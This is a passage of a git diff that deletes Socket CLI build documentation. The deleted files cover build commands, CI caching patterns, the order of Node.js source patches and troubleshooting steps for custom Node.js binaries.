bootstrap, check this instead of argv[0] -``` - -### Smart Installer -Create an installer that: -1. Detects the platform -2. Creates appropriate symlinks or copies -3. Adds to PATH -4. Handles updates - -## Troubleshooting - -### Issue: Command not routing correctly - -Check the detected binary name: -```bash -SOCKET_DEBUG=1 ./socket-npm --version -# Should show: Detected command: socket-npm -``` - -### Issue: Symlinks not working on Windows - -Windows requires admin privileges for symlinks. The build script automatically falls back to file copies on Windows. - -### Issue: Binary too large - -Since we're shipping one binary for all commands, size matters: -- Use tree-shaking in build -- Minimize bootstrap code -- Consider lazy-loading command-specific code - -## Conclusion - -This unified binary architecture allows us to maintain the expected multi-command interface while working within the constraints of single-executable packaging tools like SEA and Yao. It provides a clean, maintainable solution that works across all platforms. \ No newline at end of file diff --git a/docs/build/README.md b/docs/build/README.md deleted file mode 100644 index af69cf656..000000000 --- a/docs/build/README.md +++ /dev/null @@ -1,367 +0,0 @@ -# Socket CLI Build System - -Complete guide to building Socket CLI from source. - -## Quick Start - -```bash -# Build everything with smart caching (recommended) -pnpm build - -# Force rebuild all packages -pnpm build --force - -# Build CLI package only -pnpm build:cli - -# Watch mode for development -pnpm build:watch -# or -pnpm dev -``` - -## What Gets Built - -The Socket CLI build system builds packages in this order: - -1. **Yoga WASM** (`@socketsecurity/yoga`) - - Terminal layout engine - - Output: `packages/yoga/dist/yoga.wasm` - -2. **CLI Package** (`@socketsecurity/cli`) - - Main CLI application - - Output: `packages/cli/dist/index.js` - -3. **SEA Binary** (`@socketbin/node-sea-builder-builder`) - - Single Executable Application (Node.js + CLI bundled) - - Output: `packages/socketbin-node-sea-builder-builder/bin/socket` - -> **Note**: ONNX Runtime WASM (`@socketsecurity/onnxruntime`) is temporarily disabled due to build issues. AI features use pre-built assets. - -## Build Commands - -### Root Level Commands - -| Command | Description | -|---------|-------------| -| `pnpm build` | Smart build with caching (skips unchanged packages) | -| `pnpm build --force` | Force rebuild everything | -| `pnpm build --target ` | Build specific target (see targets below) | -| `pnpm build --platform

--arch ` | Build specific platform/arch (matches node-sea-builder syntax) | -| `pnpm build --targets ` | Build multiple targets | -| `pnpm build --platforms` | Build all platform binaries (8 platforms) | -| `pnpm build --platforms --parallel` | Build platforms in parallel (faster) | -| `pnpm build:cli` | Build just the CLI package | -| `pnpm build:watch` | Watch mode for development | - -### CLI Package Commands - -```bash -cd packages/cli - -# Build CLI -pnpm build - -# Force rebuild with clean -pnpm build --force - -# Watch mode -pnpm build --watch -``` - -## Build Targets - -Available targets for `pnpm build --target `: - -### Primary Targets -- `cli` - CLI package only -- `sea` - SEA binary builder -- `node` - Node.js smol builder -- `socket` - Socket package (bootstrap wrapper) -- `bootstrap` - Bootstrap package - -### Platform Binaries -- `darwin-arm64` - macOS Apple Silicon -- `darwin-x64` - macOS Intel -- `linux-arm64` - Linux ARM64 -- `linux-x64` - Linux x64 -- `alpine-arm64` - Alpine Linux ARM64 -- `alpine-x64` - Alpine Linux x64 -- `win32-arm64` - Windows ARM64 -- `win32-x64` - Windows x64 - -### Examples - -```bash -# Build just the CLI -pnpm build --target cli - -# Build for specific platform (combined syntax) -pnpm build --target darwin-arm64 - -# Build for specific platform (separate flags - matches node-sea-builder) -pnpm build --platform darwin --arch arm64 - -# Build multiple targets -pnpm build --targets cli,sea - -# Build all platform binaries sequentially -pnpm build --platforms - -# Build all platform binaries in parallel (faster) -pnpm build --platforms --parallel -``` - -## Build Features - -### Intelligent Caching - -The build system automatically skips packages that are already built and haven't changed: - -```bash -pnpm build -# First run: Builds all 4 packages (~2-5 minutes) - -pnpm build -# Second run: Skips all unchanged packages (< 1 second) -``` - -To force rebuild: - -```bash -pnpm build --force -``` - -### Watch Mode - -For active development, use watch mode to automatically rebuild on changes: - -```bash -pnpm build:watch -# or -pnpm dev -``` - -This watches for changes in the CLI package and automatically rebuilds. - -## Build Output - -### Directory Structure - -``` -packages/ -├── cli/ -│ ├── dist/ -│ │ ├── index.js # Main CLI bundle -│ │ ├── cli.js # CLI core (compressed) -│ │ └── cli.js.bz # Brotli compressed CLI -│ └── build/ -│ ├── cli.js # Pre-compression CLI bundle -│ ├── yoga-sync.mjs # Yoga WASM loader -│ └── onnx-sync.mjs # ONNX WASM loader -│ -├── onnxruntime/ -│ └── dist/ -│ └── ort-wasm-simd.wasm -│ -├── yoga/ -│ └── dist/ -│ └── yoga.wasm -│ -└── socketbin-node-sea-builder-builder/ - └── bin/ - └── socket # SEA binary -``` - -### Build Artifacts - -The CLI build process creates these artifacts: - -1. **TypeScript Compilation** - `.mts` → `.js` -2. **Bundling** - All code bundled into single file with esbuild -3. **WASM Extraction** - Yoga and ONNX WASM files extracted -4. **Compression** - Brotli compression for distribution -5. **Checksums** - SHA256 checksums for verification - -## Build Time Estimates - -| Build Type | Time | Disk Space | -|------------|------|------------| -| CLI only (cached) | < 1s | N/A | -| CLI only (fresh) | 30-60s | ~50 MB | -| Full build (cached) | < 1s | N/A | -| Full build (fresh) | 2-5 min | ~200 MB | -| Platform binaries (sequential) | 30-60 min | ~1 GB | -| Platform binaries (parallel) | 10-20 min | ~1 GB | - -## Setup Requirements - -### Development Dependencies - -Install dependencies: - -```bash -pnpm install -``` - -### Platform-Specific Tools - -See [Build Toolchain Setup](build-toolchain-setup.md) for platform-specific installation guides. - -**Quick check:** - -```bash -# Verify you have required tools -node --version # >=18 -pnpm --version # >=10.16.0 -``` - -## Build Configuration - -### Environment Variables - -Configure builds with environment variables: - -```bash -# Published build (production optimizations) -INLINED_SOCKET_CLI_PUBLISHED_BUILD=1 pnpm build - -# Legacy build (compatibility mode) -INLINED_SOCKET_CLI_LEGACY_BUILD=1 pnpm build - -# Sentry build (with error tracking) -INLINED_SOCKET_CLI_SENTRY_BUILD=1 pnpm build - -# No minification (for debugging) -SOCKET_CLI_NO_MINIFY=1 pnpm build - -# Force build (skip cache) -SOCKET_CLI_FORCE_BUILD=1 pnpm build -``` - -### Build Scripts - -The build system consists of: - -- **Root**: `scripts/build.mjs` - Orchestrates full build with caching -- **CLI**: `packages/cli/scripts/build.mjs` - Builds CLI package -- **esbuild**: `packages/cli/.config/esbuild.cli.build.mjs` - Bundle configuration - -## Troubleshooting - -### Build Fails with "Module not found" - -**Solution**: Ensure dependencies are installed: - -```bash -pnpm install -``` - -### Build is Slow - -**Solution**: Use caching and parallel builds: - -```bash -# Smart caching (only rebuilds changed packages) -pnpm build - -# Parallel platform builds -pnpm build --platforms --parallel -``` - -### "Command not found: pnpm" - -**Solution**: Install pnpm: - -```bash -npm install -g pnpm@latest -``` - -### Clean Build After git pull - -**Solution**: Force rebuild: - -```bash -pnpm build --force -``` - -### WASM Files Missing - -**Solution**: Build will automatically extract WASM files, but you can manually run: - -```bash -cd packages/cli -node scripts/extract-yoga-wasm.mjs -``` - -## Related Documentation - -- [Build/Dist Structure](build-dist-structure.md) - Output directory structure -- [Caching Strategy](caching-strategy.md) - How caching works -- [WASM Build Guide](wasm-build-guide.md) - Building WASM packages -- [Node.js Build Quick Reference](node-build-quick-reference.md) - Building custom Node.js -- [Node.js Patch Creation Guide](node-patch-creation-guide.md) - Creating Node.js patches - -## Advanced Topics - -### Building Custom Node.js Binaries - -For building custom Node.js binaries with Socket patches, see: -- [Node.js Build Quick Reference](node-build-quick-reference.md) -- [Node.js Patch Creation Guide](node-patch-creation-guide.md) - -### Platform-Specific Builds - -Build for specific platforms: - -```bash -# macOS Apple Silicon -pnpm build --target darwin-arm64 - -# Linux x64 -pnpm build --target linux-x64 - -# Windows x64 -pnpm build --target win32-x64 -``` - -### SEA Binary Build - -Build the Single Executable Application: - -```bash -# Via target -pnpm build --target sea - -# Via CLI package -cd packages/cli -pnpm build --sea -``` - -### CI/CD Integration - -For CI/CD pipelines: - -```bash -# Install dependencies -pnpm install --frozen-lockfile - -# Build everything -pnpm build - -# Verify build -pnpm check -pnpm test -``` - -## Help - -For more help: - -```bash -# Show build system help -pnpm build --help - -# Show available targets -pnpm build --help | grep -A20 "Available Targets" -``` diff --git a/docs/build/build-dist-structure.md b/docs/build/build-dist-structure.md deleted file mode 100644 index 48de7ce4e..000000000 --- a/docs/build/build-dist-structure.md +++ /dev/null @@ -1,180 +0,0 @@ -# Build/Dist Structure with History/Archive Pattern - -## Philosophy - -**build/** (gitignored) -- Workspace for building with intermediates -- Archive/history of completed builds with different configs -- Allows comparison, experimentation, rollback -- All ephemeral but useful for development - -**dist/** (tracked in git) -- The "blessed" canonical distribution artifact -- What actually ships and gets consumed by other packages -- Single source of truth for "current production build" - -## Recommended Structure - -``` -packages// -├── build/ # Gitignored workspace + archive -│ ├── tmp/ # Current build intermediates (cmake, obj files, etc.) -│ ├── cache/ # Download caches, source clones -│ └── archive/ # Historical completed builds -│ ├── 2025-10-26-001-opt-size/ -│ ├── 2025-10-26-002-opt-speed/ -│ ├── 2025-10-26-003-debug/ -│ └── latest/ # Symlink to most recent build -└── dist/ # Tracked canonical releases - └── -``` - -## Package-Specific Patterns - -### packages/yoga-layout - -``` -build/ -├── tmp/ # cmake/, _deps/, bin/, yoga-source/ -├── cache/ # Downloaded yoga source tarballs -└── archive/ - ├── 2025-10-26-opt-oz/ # Build with -Oz optimization - │ ├── yoga.wasm - │ └── yoga.js - ├── 2025-10-26-opt-o3/ # Build with -O3 optimization - │ ├── yoga.wasm - │ └── yoga.js - └── latest -> 2025-10-26-opt-oz/ - -dist/ -├── yoga.wasm # Blessed release (copied from build/archive/latest/) -└── yoga.js -``` - -### packages/minilm-builder - -``` -build/ -├── tmp/ # Python venv, conversion intermediates -├── cache/ # Hugging Face model cache -└── archive/ - ├── minilm-l6-v2-int8/ # INT8 quantized - │ ├── model.onnx - │ └── tokenizer.json - ├── minilm-l6-v2-fp16/ # FP16 quantized - │ ├── model.onnx - │ └── tokenizer.json - └── latest -> minilm-l6-v2-int8/ - -dist/ -├── model.onnx # Blessed model -└── tokenizer.json -``` - -### packages/node-sea-builder - -``` -build/ -├── tmp/ # AST transformation temp files -├── cache/ # Node binary cache -└── archive/ - ├── socket-sea-full/ # Full CLI embedded - │ ├── socket-macos-arm64 - │ ├── socket-linux-x64 - │ └── build-manifest.json - ├── socket-sea-minimal/ # Minimal CLI - │ └── socket-macos-arm64 - └── latest -> socket-sea-full/ - -dist/ -├── socket-macos-arm64 # Blessed SEA binary -├── socket-linux-x64 -└── socket-win-x64.exe -``` - -### packages/node-smol-builder - -``` -build/ -├── tmp/ # Node.js build intermediates (obj files) -├── cache/ # Node.js source cache -└── archive/ - ├── node-24.10.0-brotli-sea/ # With brotli+sea patches - │ ├── node - │ └── build-manifest.json - ├── node-24.10.0-minimal/ # Minimal patches - │ └── node - ├── node-24.10.0-compressed/ # Post-compression - │ └── node - └── latest -> node-24.10.0-compressed/ - -dist/ -└── node # Blessed Node.js binary -``` - -### packages/cli - -``` -# Special case - dist/ is gitignored (ephemeral Rollup output) -dist/ -└── cli.js # Rollup bundled CLI (consumed by node-sea-builder) -``` - -## Build Script Pattern - -Build scripts should support archiving with: -- Timestamp-based archive naming: `YYYY-MM-DD-NNN-description` -- Build manifest JSON: config, flags, version, size, date -- Automatic "latest" symlink update -- Optional `--archive` flag to save to archive/ -- Copy from archive/latest/ → dist/ for "blessed" promotion - -## Benefits - -1. **Experimentation**: Try different optimization levels without losing previous builds -2. **Comparison**: Easy A/B testing of build configurations -3. **Rollback**: Keep working builds when experimenting -4. **History**: Understand what changed between builds -5. **Debugging**: Compare artifacts when tracking down issues -6. **Documentation**: Build manifests document exact build configuration - -## Gitignore Strategy - -```gitignore -# .gitignore (root) -**/build/ # All build artifacts and archives (gitignored) - -# dist/ NOT globally ignored - tracked in git for blessed releases -# Exception: packages/cli/.gitignore ignores its own dist/ (ephemeral Rollup output) -``` - -## Promotion Workflow - -1. Build → `build/tmp/` (intermediates) -2. Success → `build/archive//` (completed build) -3. Update → `build/archive/latest` symlink -4. Test and validate -5. Promote → Copy `build/archive/latest/*` → `dist/` (blessed release) -6. Commit `dist/` changes to git - -## Example Build Manifest - -`build/archive/2025-10-26-001-opt-oz/build-manifest.json`: -```json -{ - "timestamp": "2025-10-26T14:30:00Z", - "config": { - "optimization": "-Oz", - "target": "wasm32", - "features": ["size-optimized"] - }, - "artifacts": [ - {"file": "yoga.wasm", "size": 133120, "hash": "sha256:abc123..."}, - {"file": "yoga.js", "size": 19456, "hash": "sha256:def456..."} - ], - "versions": { - "yoga": "3.1.0", - "emscripten": "3.1.50" - } -} -``` diff --git a/docs/build/caching-strategy.md b/docs/build/caching-strategy.md deleted file mode 100644 index a25210c3f..000000000 --- a/docs/build/caching-strategy.md +++ /dev/null @@ -1,241 +0,0 @@ -# Build Caching Strategy - -## Overview - -Socket CLI uses a **unified, consistent caching strategy** across all build workflows to minimize build times and preserve compilation progress between CI runs. - -## Strategy Decision Tree - -``` -Does the build compile C/C++? -├─ YES → Is it native or WASM? -│ ├─ Native Build (smol) -│ │ ├─ Use ccache for per-object-file caching -│ │ └─ Use build directory cache for CMake state -│ └─ WASM Build (Yoga, ONNX) -│ └─ Use build directory cache only -│ (Emscripten doesn't integrate well with ccache) -└─ NO (AI Models, SEA) - └─ Cache final output only -``` - -## Caching Patterns - -### Pattern 1: Native C++ Builds (smol) - -**Use case**: Compiling Node.js from source to native binaries - -**Strategy**: ccache + build directory cache - -```yaml -- name: Setup ccache (Linux/macOS) - uses: hendrikmuhs/ccache-action@... - with: - key: build-${{ platform }}-${{ arch }}-${{ hash }} - max-size: 2G - -- name: Restore build cache - uses: actions/cache@... - with: - path: | - packages/node-smol-builder/build - packages/node-smol-builder/.node-source - key: node-smol-build-${{ platform }}-${{ arch }}-${{ hash }} - restore-keys: | - node-smol-build-${{ platform }}-${{ arch }}- - -- name: Restore binary cache - uses: actions/cache@... - with: - path: packages/node-smol-builder/dist/socket-smol-* - key: node-smol-${{ platform }}-${{ arch }}-${{ hash }} -``` - -**Why both ccache and build directory?** -- **ccache**: Caches individual compiled object files (very granular) -- **build directory**: Caches CMake configuration, dependency tracking, build state -- **Together**: Maximum build speed and failure recovery - -**Benefits:** -- First build: ~60-90 minutes -- Cached build: ~5-10 minutes (ccache hits on all objects) -- Partial failure: Can resume from cached state - -### Pattern 2: WASM C++ Builds (Yoga, ONNX) - -**Use case**: Compiling C++ to WebAssembly with Emscripten - -**Strategy**: Build directory cache only (no ccache) - -```yaml -- name: Restore output cache - uses: actions/cache@... - with: - path: packages/yoga-layout/build/wasm - key: yoga-wasm-${{ hash }} - -- name: Restore build cache - uses: actions/cache@... - with: - path: | - packages/yoga-layout/build - packages/yoga-layout/.yoga-source - key: yoga-build-${{ hash }} - restore-keys: | - yoga-build- -``` - -**Why no ccache?** -- Emscripten uses custom LLVM-based compilation -- ccache integration is unreliable with Emscripten -- Build directory caching achieves the same goal more simply - -**Benefits:** -- Yoga: ~2-3 minutes → ~1 minute (already fast) -- ONNX: ~30-40 minutes → ~2-3 minutes (on failure recovery) -- Simpler, more reliable than ccache integration - -### Pattern 3: Non-C++ Builds (AI Models, SEA) - -**Use case**: Python model conversion, JavaScript bundling - -**Strategy**: Output cache only - -```yaml -- name: Restore output cache - uses: actions/cache@... - with: - path: packages/socketbin-cli-ai/dist - key: ai-models-${{ hash }} -``` - -**Why output only?** -- No compilation involved (Python scripts, JS bundling) -- Intermediate state doesn't speed up rebuilds -- Simple caching is sufficient - -**Why no directory cache?** - -**AI Models:** -- Single-pass conversion process (PyTorch → ONNX → Quantize) -- No incremental compilation (can't resume partway) -- Intermediate files are temporary and immediately deleted -- If conversion fails, must restart from beginning anyway -- Total time: ~10-15 minutes (not long enough to justify cache overhead) - -**SEA (Single Executable Application):** -- Just bundling JavaScript + injecting into pre-built Node.js binary -- Total time: ~30 seconds (already very fast) -- Uses pre-built Node.js from pkg cache (no compilation) -- JavaScript bundling regenerates instantly (~10 seconds) -- Cache download time would exceed rebuild time - -**When directory caching is valuable:** -- ✅ Compilation is slow (>5 minutes) -- ✅ Builds can fail partway through long compilation -- ✅ Intermediate state is reusable (compiled objects, CMake cache) -- ✅ Resuming from cache is faster than rebuilding - -**When directory caching is NOT valuable:** -- ❌ No compilation (just scripting, bundling, copying) -- ❌ Builds are already fast (<1 minute) -- ❌ No reusable intermediate state (temp files, single-pass operations) -- ❌ Cache overhead exceeds time saved - -## Cache Key Strategy - -All caches use **content-based hashing** for invalidation: - -```bash -HASH=$(find -type f \( -name "pattern" \) | sort | xargs sha256sum | sha256sum | cut -d' ' -f1) -``` - -**Key format:** -``` ----- -``` - -**Examples:** -- `node-smol-build-linux-x64-abc123def456` (smol build cache) -- `yoga-build-abc123def456` (Yoga build cache) -- `onnx-runtime-build-abc123def456` (ONNX build cache) - -**Restore keys** provide prefix matching for partial cache hits: -```yaml -restore-keys: | - node-smol-build-linux-x64- - node-smol-build-linux- -``` - -## Cache Layers - -### Layer 1: Build Dependencies -- **Cached**: Python, Ninja, Emscripten SDK -- **Purpose**: Avoid re-downloading build tools -- **Duration**: Stable across builds - -### Layer 2: Source Code -- **Cached**: Cloned repositories (`.node-source/`, `.yoga-source/`, `.onnx-source/`) -- **Purpose**: Skip git clone operations -- **Duration**: Stable unless version changes - -### Layer 3: Intermediate Build -- **Cached**: CMake cache, compiled objects (`build/`) -- **Purpose**: Resume compilation from previous state -- **Duration**: Invalidated on source/patch changes - -### Layer 4: Compilation Cache (Native only) -- **Cached**: Per-object-file compilation results (ccache) -- **Purpose**: Instant reuse of unchanged compiled objects -- **Duration**: Survives source changes (object-level granularity) - -### Layer 5: Final Output -- **Cached**: Blessed artifacts (`dist/`) -- **Purpose**: Skip entire build if nothing changed -- **Duration**: Exact hash match required - -## Build Time Comparison - -| Build | First Run | Cached | With Intermediate Cache | -|-------|-----------|--------|------------------------| -| Smol (native) | 60-90 min | 5-10 min | 10-15 min (partial) | -| ONNX (WASM) | 30-40 min | instant | 2-3 min (on failure) | -| Yoga (WASM) | 2-3 min | instant | 1-2 min (partial) | -| AI Models | 10-15 min | instant | N/A (no compilation) | -| SEA | 5-10 min | instant | N/A (just bundling) | - -## Implementation Checklist - -When adding a new build workflow: - -- [ ] Determine if it compiles C/C++ (Pattern 1 or 2) -- [ ] If native C++: Add ccache setup -- [ ] Add build directory cache for all C++ builds -- [ ] Add output cache for final artifacts -- [ ] Use content-based hash for cache keys -- [ ] Add restore-keys for prefix matching -- [ ] Test cache hit/miss scenarios -- [ ] Document expected build times - -## Troubleshooting - -### Cache not restoring -- Check cache key hash generation includes all relevant files -- Verify restore-keys provide fallback options -- Check GitHub Actions cache size limits (10 GB per repo) - -### Build slower with cache -- Check ccache statistics (`ccache -s`) -- Verify build directory cache includes CMake cache -- Check for cache corruption (force rebuild with `--force`) - -### Cache too large -- Adjust ccache max-size (default: 2G) -- Clean build directories of unnecessary artifacts -- Consider excluding large intermediate files - -## Related Documentation - -- [Build/Dist Structure](build-dist-structure.md) - Archive and promotion workflow -- [Node.js Patches](../../build/patches/socket/README.md) - Patch management -- [GitHub Actions Caching](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) diff --git a/docs/build/node-build-order-explained.md b/docs/build/node-build-order-explained.md deleted file mode 100644 index 971b66db7..000000000 --- a/docs/build/node-build-order-explained.md +++ /dev/null @@ -1,287 +0,0 @@ -# Node.js Build Order Explained - -This document clarifies the order of operations in the Node.js custom binary build process and explains why yao-pkg patches are applied before Socket patches. - -## TL;DR - -**Order**: yao-pkg patches → Socket patches → Build → Binary - -This is correct because: -- yao-pkg patches modify the **build system** (V8, PKG infrastructure) -- Socket patches modify **runtime behavior** (JavaScript code) -- Both are applied to **source code** before compilation -- The resulting **binary** is what pkg uses - -## Common Confusion - -**Misconception**: "yao-pkg needs our binary before it can patch" - -**Reality**: yao-pkg provides **patches for Node.js source code**, not tools that operate on binaries. We're not patching yao-pkg's tools; we're using yao-pkg's patches to modify Node.js. - -## The Complete Flow - -### Phase 1: Source Preparation - -``` -1. Clone Node.js source code (v24.10.0) - └─> Downloads ~2GB from nodejs/node repository - └─> Result: .custom-node-build/node-yao-pkg/ directory -``` - -### Phase 2: yao-pkg Patches (Infrastructure) - -``` -2. Apply yao-pkg patches to Node.js SOURCE - ├─> Modifies V8 engine (deps/v8/) - │ └─> Enables bytecode compilation without source - │ └─> Allows pkg to bundle pre-compiled bytecode - │ - ├─> Modifies Node.js build system (node.gyp, tools/) - │ └─> Adds PKG bootstrap code - │ └─> Adds BAKERY placeholder system - │ └─> Configures for single-file executable support - │ - └─> Result: Node.js source is now pkg-compatible -``` - -**What these patches do**: -- **V8 Bytecode**: Allows V8 to load bytecode without original JavaScript source -- **PKG Bootstrap**: Adds special entry point for pkg-built executables -- **BAKERY Placeholder**: System for runtime argument injection - -**Files Modified** (examples): -- `deps/v8/src/codegen/compiler.cc` - V8 compilation changes -- `lib/internal/bootstrap/node.js` - Bootstrap modifications -- `src/node.cc` - Node.js core changes -- `node.gyp` - Build system changes - -### Phase 3: Socket Patches (Behavior) - -``` -3. Apply Socket patches to Node.js SOURCE - └─> Modifies lib/sea.js (JavaScript file) - ├─> Changes: const { isSea, ... } = internalBinding('sea'); - └─> To: const isSea = () => true; - const { ... } = internalBinding('sea'); -``` - -**What this patch does**: -- Makes `require('node:sea').isSea()` always return `true` -- Required because pkg executables need to behave as Single Executable Applications -- Without this, pkg binaries can't properly detect their embedded code - -**Files Modified**: -- `lib/sea.js` - Single file, simple JavaScript change - -### Phase 4: Build - -``` -4. Configure Node.js build - └─> ./configure --with-intl=small-icu --without-npm ... - -5. Build Node.js binary - └─> make -j10 (30-60 minutes depending on CPU) - └─> Result: .custom-node-build/node-yao-pkg/out/Release/node -``` - -**Result**: A Node.js binary that: -- ✅ Can load V8 bytecode (yao-pkg patch) -- ✅ Has PKG bootstrap system (yao-pkg patch) -- ✅ Reports as SEA (Socket patch) -- ✅ Works with pkg to create single-file executables - -### Phase 5: Post-Build - -``` -6. Strip debug symbols - └─> 82MB → 54MB - -7. Code sign (macOS ARM64) - └─> Ad-hoc signing - -8. Install to pkg cache - └─> Copy to ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64 -``` - -### Phase 6: Usage - -``` -9. User runs: pnpm exec pkg . - └─> pkg tool uses our custom Node.js binary from cache - └─> Creates single-file executable with embedded code - └─> Executable works because: - ├─> V8 can load bytecode (yao-pkg patch) - ├─> PKG bootstrap loads code (yao-pkg patch) - └─> isSea() returns true (Socket patch) -``` - -## Why This Order? - -### Why yao-pkg First? - -**yao-pkg patches modify infrastructure**: -- V8 engine internals (C++) -- Node.js build system (gyp files) -- Core Node.js runtime (C++) - -**These must be applied first** because they change how Node.js: -- Compiles (build system changes) -- Starts up (bootstrap changes) -- Executes code (V8 changes) - -### Why Socket Second? - -**Socket patches modify behavior**: -- JavaScript runtime behavior (lib/sea.js) -- Pure JavaScript changes -- No C++ or build system changes - -**These must be applied after** because: -- They depend on the infrastructure being correct -- They're simple overlays on top of yao-pkg's infrastructure -- They don't affect the build system itself - -### Why Not the Other Way? - -If we applied Socket patches first, then yao-pkg patches: -- ❌ yao-pkg patches might conflict with our changes -- ❌ yao-pkg patches might overwrite our changes -- ❌ Build system changes wouldn't see our modifications - -## Dependency Graph - -``` -Node.js Source Code (v24.10.0) - ↓ - [yao-pkg patches] - ├─> V8 Bytecode Support - ├─> PKG Bootstrap System - └─> Build System Changes - ↓ - [Socket patches] - └─> SEA Detection Override - ↓ - [Build Process] - └─> Compile to Binary - ↓ - Custom Node.js Binary - ↓ - [pkg tool uses it] - └─> Single-file Executable -``` - -## What If We Reversed The Order? - -### Scenario: Socket Patches → yao-pkg Patches - -``` -1. Apply Socket patch to lib/sea.js - └─> isSea = () => true - -2. Apply yao-pkg patches - └─> Might modify lib/sea.js in conflicting way - └─> Could overwrite our changes - └─> Context might not match anymore -``` - -**Result**: Patch conflicts or lost changes - -### Scenario: Both at Once - -``` -1. Merge patches into one file -``` - -**Problems**: -- Hard to maintain separate concerns -- Can't update yao-pkg independently -- Harder to debug which patch caused issues -- Loses modularity - -## Real-World Analogy - -Think of building a custom car: - -1. **yao-pkg patches** = Modifying the **engine and chassis** - - Change how the engine works internally - - Modify the frame structure - - Add special fuel injection system - -2. **Socket patches** = Installing **custom dashboard software** - - Changes what the speedometer displays - - Modifies instrument cluster behavior - - Pure software change, no engine mods - -**Order**: -1. First: Modify engine (yao-pkg) - Must be done before software -2. Then: Install dashboard software (Socket) - Depends on engine being ready -3. Finally: Drive the car (Build) - Compiles everything together - -## Verification - -You can verify this order is correct by checking what each patch modifies: - -### Check yao-pkg Patch - -```bash -head -100 .custom-node-build/patches/node.v24.10.0.cpp.patch - -# You'll see: -# - deps/v8/... (V8 engine files) -# - src/node.cc (Core Node.js C++) -# - node.gyp (Build system) -# - lib/internal/bootstrap/... (Bootstrap code) -``` - -### Check Socket Patch - -```bash -cat build/patches/socket/enable-sea-for-pkg-binaries-v24.patch - -# You'll see: -# - lib/sea.js (Single JavaScript file) -# - Simple behavior change -``` - -**No overlap** = Safe to apply in sequence - -## What About "yao needs our bin"? - -This might refer to a different part of the process: - -**What might be confused**: -- We need yao-pkg's **patches** (not binary) to build our Node.js -- pkg tool (the binary) uses our **Node.js binary** to create executables -- But pkg tool is already built - we don't build it - -**Correct understanding**: -- yao-pkg project provides: Patches for Node.js -- We apply those patches to: Node.js source -- We build: Custom Node.js binary -- pkg tool uses: Our custom Node.js binary -- Result: Single-file executables - -## Summary - -**The order is correct**: -1. ✅ yao-pkg patches (infrastructure: V8, build system, bootstrap) -2. ✅ Socket patches (behavior: SEA detection) -3. ✅ Build (compile everything) -4. ✅ Result: Binary that works with pkg - -**Why it works**: -- Infrastructure first (yao-pkg) -- Behavior second (Socket) -- No conflicts or overwrites -- Clean separation of concerns - -**Common confusion cleared**: -- We're patching Node.js **source**, not binaries -- yao-pkg provides **patches**, not a tool that needs our binary -- The resulting **binary** is what pkg uses -- Order is: patch → patch → build → binary, not: binary → patch - ---- - -**Last Updated**: 2025-10-15 -**Applies To**: Socket CLI v1.0.80+ diff --git a/docs/build/node-build-quick-reference.md b/docs/build/node-build-quick-reference.md deleted file mode 100644 index 8fdb0ac96..000000000 --- a/docs/build/node-build-quick-reference.md +++ /dev/null @@ -1,449 +0,0 @@ -# Node.js Build Quick Reference - -Quick reference guide for building custom Node.js binaries with yao-pkg and Socket patches. - -## 🚀 Common Commands - -### Build Commands - -```bash -# Normal build (incremental if possible) -node scripts/build-yao-pkg-node.mjs - -# Clean build (start from scratch) -node scripts/build-yao-pkg-node.mjs --clean - -# Build and verify -node scripts/build-yao-pkg-node.mjs --verify - -# Clean build with verification -node scripts/build-yao-pkg-node.mjs --clean --verify -``` - -### Verification Commands - -```bash -# Verify the build -node scripts/verify-node-build.mjs - -# Integration test (build → pkg → execute) -node scripts/test-yao-pkg-integration.mjs -``` - -### Maintenance Commands - -```bash -# Remove build artifacts (clean slate) -rm -rf .custom-node-build/ - -# Remove just the Node.js source (keep patches) -rm -rf .custom-node-build/node-yao-pkg/ - -# Clear pkg cache -rm -rf ~/.pkg-cache/ -``` - -## 🔍 Troubleshooting - -### Build Fails: "Tool not available" - -**Error**: -``` -❌ strip is NOT available -❌ codesign is NOT available -``` - -**Fix**: -```bash -# Install Xcode Command Line Tools -xcode-select --install - -# Verify tools are available -which strip # Should return: /usr/bin/strip -which codesign # Should return: /usr/bin/codesign -``` - -### Build Fails: "Patch validation failed" - -**Error**: -``` -❌ INVALID: Patch supports v24.9.0-v24.9.5 but you're using v24.10.0 -``` - -**Fix**: -```bash -# Option 1: Remove incompatible patch (system will use direct modifications) -rm build/patches/socket/fix-v8-include-paths-*.patch - -# Option 2: Use correct Node.js version -# Edit scripts/build-yao-pkg-node.mjs and change NODE_VERSION -``` - -### Build Fails: "V8 include path not found" - -**Error**: -``` -fatal error: 'base/iterator.h' file not found -``` - -**Fix**: -```bash -# This happens when wrong patches are applied to v24.10.0+ -# Clean and rebuild (will use direct modifications) -node scripts/build-yao-pkg-node.mjs --clean -``` - -**Why**: v24.10.0+ has correct V8 include paths. Don't apply v24.9.0 V8 patches! - -### Build Fails: "Download failed" - -**Error**: -``` -❌ Download Failed -Failed to download yao-pkg patch after 3 attempts -``` - -**Fix**: -```bash -# Check internet connection -curl -I https://github.com - -# Manually download patch -curl -L https://raw.githubusercontent.com/yao-pkg/pkg-fetch/main/patches/node.v24.10.0.cpp.patch \ - -o .custom-node-build/patches/node.v24.10.0.cpp.patch - -# Retry build -node scripts/build-yao-pkg-node.mjs -``` - -### Build Fails: "Corrupted patch file" - -**Error**: -``` -❌ Corrupted Patch File -Downloaded patch file is corrupted: File contains HTML -``` - -**Fix**: -```bash -# System will auto-retry, but if persistent: -rm .custom-node-build/patches/node.v24.10.0.cpp.patch -node scripts/build-yao-pkg-node.mjs -``` - -### Build Fails: During compilation - -**Error**: -``` -❌ Build Failed -Node.js compilation failed. See build log for details. -``` - -**Fix**: -```bash -# Check last 50 lines of log (shown automatically) -# Full log: -less .custom-node-build/build.log - -# Common issues: -# 1. Out of memory - Close other applications -# 2. Disk full - Free up space (need 5GB) -# 3. Compiler error - Reinstall Xcode tools - -# Try clean build -node scripts/build-yao-pkg-node.mjs --clean -``` - -### Build Succeeds but Binary Doesn't Work - -**Symptoms**: -```bash -./out/Release/node --version -# No output or segfault -``` - -**Fix**: -```bash -# Verify build -node scripts/verify-node-build.mjs - -# If verification fails, rebuild -node scripts/build-yao-pkg-node.mjs --clean --verify - -# Check if Socket modifications were applied correctly -grep -r "const isSea = () => true" .custom-node-build/node-yao-pkg/lib/sea.js -# Should return a match -``` - -### pkg Build Fails: "Binary not found" - -**Error**: -``` -Error: Binary not found in cache -``` - -**Fix**: -```bash -# Check if binary exists in cache -ls -lh 